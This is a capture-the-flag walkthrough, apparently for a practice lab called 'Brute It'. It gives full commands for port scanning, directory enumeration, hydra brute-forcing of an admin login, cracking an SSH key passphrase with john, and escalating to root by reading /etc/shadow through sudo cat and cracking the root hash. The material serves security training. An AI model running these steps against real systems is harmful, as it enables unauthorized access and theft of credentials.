Brute It

Task 2: Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.254.237

We have 2 open ports.

Detailed Nmap Scan :

Command Breakdown:

• (-sV): Service version

• (-sC): Default nmap scripts

• (-p): Specifying ports 22,80

• (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 22,80 -oN nmap 10.10.254.237

We have the version of SSH running: OpenSSH 7.6p1

The version of Apache running is 2.4.29

The Linux distribution running is Ubuntu.

Lets visit the website

It a default apache2 webpage. Lets look for hidden directories on the web server using gobuster.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.254.237/

We found a directory called /admin.

Task 3: Getting a Shell

Lets visit the directory we found.

Its a login page. As this is a admin login page, the username is most probably admin, we can also confirm this when we look at the source code of this page.

Lets use hydra to brute force and find the password. Before that we need the syntax of how the username and password are submitted. We can do this by using Burpsuite. Lets attempt a login and capture the request with burp.

The format is user=<username>&pass=<password> , which we will supply to burp, we also see a PHPSESSID cookie, which we need to include in the hydra command. The other thing we need is what the website response is when there is a failed login attempt. Lets forward the request and we can see this.

Now we have all the information we need, so lets run Hydra to crack the password.

Hydra command breakdown:

• -l admin: Specifying the username as admin

• -P /usr/share/wordlists/rockyou.txt: Specifying the password list.

• 10.10.254.237: Target IP

• http-post-form: Type of attack protocol. We are using this as we are attacking a HTTP website form.

• /admin/: The directory we are attacking which has the login form

• user=^USER^&pass=^PASS^: Login response from Burpsuite,

• Username or password invalid: Response when there is failed login.

• H=Cookie: security=low; PHPSESSID=srir42se2cdt5roedi45msdgr0: Cookie from the response.

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.254.237 http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid:H=Cookie: security=low; PHPSESSID=srir42se2cdt5roedi45msdgr0"

After running this we find the password xavier. Lets login.

We found the first flag, and we also have a rsa private key. Lets copy it to our machine and name the file id_rsa and then lets find the password using ssh2johnand then crack the password using john.

Lets now use ssh2john.

/usr/share/john/ssh2john.py id_rsa > id_rsa_hash

Now lets crack this hash using john.

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash

And we have the password, lets login through ssh. This password might be the user John password as it was the only other username we found. But before that we need to change the permissions of the id_rsa file so that we can login with right permissions.

chmod 600 id_rsa

Now lets login

ssh -i id_rsa john@10.10.254.237

We are logged in. We can read the user.txt file.

We can now answer all the questions in this section.

Task 4: Privilege Escalation

Lets run sudo -l to see what we can run as root.

sudo -l

Looks like we can run /bin/cat as root. Looking on GTFOBins we can see that we can set a parameter to a file and we can read that file.

The /etc/shadow file stores passwords of all users on the machine, so we can find the root hash and then crack it using johntheripper. Lets first set the LFILE parameter to /etc/shadow and then read it.

LFILE=/etc/shadow
sudo cat "$LFILE"

We have the root hash, lets copy it to our machine and store it in a file called hash and then crack it using john.

Now lets crack it and then show it.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

john --show hash

We have the password for root. Lets switch users.

su root

We can now read the root flag and also answer all the questions in this section